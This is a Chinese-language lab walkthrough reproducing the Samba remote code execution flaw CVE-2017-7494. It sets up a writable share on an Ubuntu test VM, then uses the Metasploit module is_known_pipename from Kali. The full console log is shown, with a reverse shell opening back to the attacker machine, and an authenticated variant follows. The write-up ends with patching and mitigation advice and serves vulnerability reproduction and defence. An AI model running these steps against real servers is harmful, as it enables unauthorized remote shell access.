概述

Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
这里采用ubuntu-16.04.2 x64位为测试机。

复现过程

环境的搭建

靶机中默认未安装Samba,首先来安装Samba并进行配置。

1
sudo apt install samba

安装samba

安装成功,查看版本

查看版本

修改Samba配置文件

1
sudo gedit /etc/samba/smb.conf

在最底部添加如下内容

1
2
3
4
[fuping] #显示的共享文件夹名字
path = /tmp
public = yes
writeable = yes

修改配置文件

然后重启smbd服务

1
sudo service smbd restart

至此,环境已经搭建成功。开始用Kail进行攻击。

攻击过程

首先去下载利用的脚本。

1
2
[email protected]:~# cd /usr/share/metasploit-framework/modules/exploits/linux/samba
[email protected]:/usr/share/metasploit-framework/modules/exploits/linux/samba# wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O is_known_pipename.rb

下载脚本

然后就是在Metasploit中加载并使用脚本,攻击过程如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
2 Linux x86
msf exploit(is_known_pipename) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Linux ARM (LE)
2 Linux x86
3 Linux x86_64
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > set target 3
target => 3
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.232.134:4444
[*] 192.168.232.137:445 - Using location \\192.168.232.137\fuping\ for the path
[*] 192.168.232.137:445 - Payload is stored in //192.168.232.137/fuping/ as gRoUnyzb.so
[*] 192.168.232.137:445 - Trying location /volume1/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /tmp/gRoUnyzb.so...
[*] Command shell session 1 opened (192.168.232.134:4444 -> 192.168.232.137:41392) at 2017-05-24 12:35:20 -0400
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
whoami
nobody
ifconfig
docker0 Link encap:Ethernet HWaddr 02:42:23:77:72:91
inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:23ff:fe77:7291/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:180 (180.0 B)
ens33 Link encap:Ethernet HWaddr 00:0c:29:77:23:9e
inet addr:192.168.232.137 Bcast:192.168.232.255 Mask:255.255.255.0
inet6 addr: fe80::7651:9ad0:80e5:c9c8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:349052 errors:0 dropped:0 overruns:0 frame:0
TX packets:112974 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:419009840 (419.0 MB) TX bytes:8902292 (8.9 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:23329 errors:0 dropped:0 overruns:0 frame:0
TX packets:23329 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:48010585 (48.0 MB) TX bytes:48010585 (48.0 MB)

需要填写目标地址和选择Target,我的是x64位系统,所以设置了target为3。

效果图

脚本说明

攻击成功

更新

2017.05.26 对需要登陆的Smb进行验证

脚本已经更新,集成在msf中,直接msfupdate即可。

1.修改Ubuntu中的Samba配置文件。

1
sudo gedit /etc/samba/smb.conf

[global]中添加:security = user
修改底部的[fuping]

1
2
3
[fuping] #显示的共享文件夹名字
path = /tmp
writeable = yes

更新Samba配置文件

2.添加smb用户

1
2
sudo useradd smbuser
sudo smbpasswd -a smbuser

添加smb用户

3.开始攻击

1
2
3
4
5
6
7
8
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set SMBUSER smbuser
SMBUSER => smbuser
msf exploit(is_known_pipename) > set SMBPASS smbuser
SMBPASS => smbuser
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > exploit

有验证攻击成功

解决方案

1.受影响的用户尽快下载最新的Samba版本手动更新。
2.使用二进制分发包(RPM等方式)的用户立即进行yum,apt-get update等安全更新操作
3.不打补丁的缓解策略:用户可以通过在smb.conf的[global]节点下增加“nt pipe support = no”选项,然后重新启动samba服务, 以此达到缓解该漏洞的效果。

参考

[1]https://github.com/rapid7/metasploit-framework/pull/8450
[2]http://bobao.360.cn/learning/detail/3900.html
[3]https://securityonline.info/cve-2017-7494-samba-remote-code-execution-vulnerability/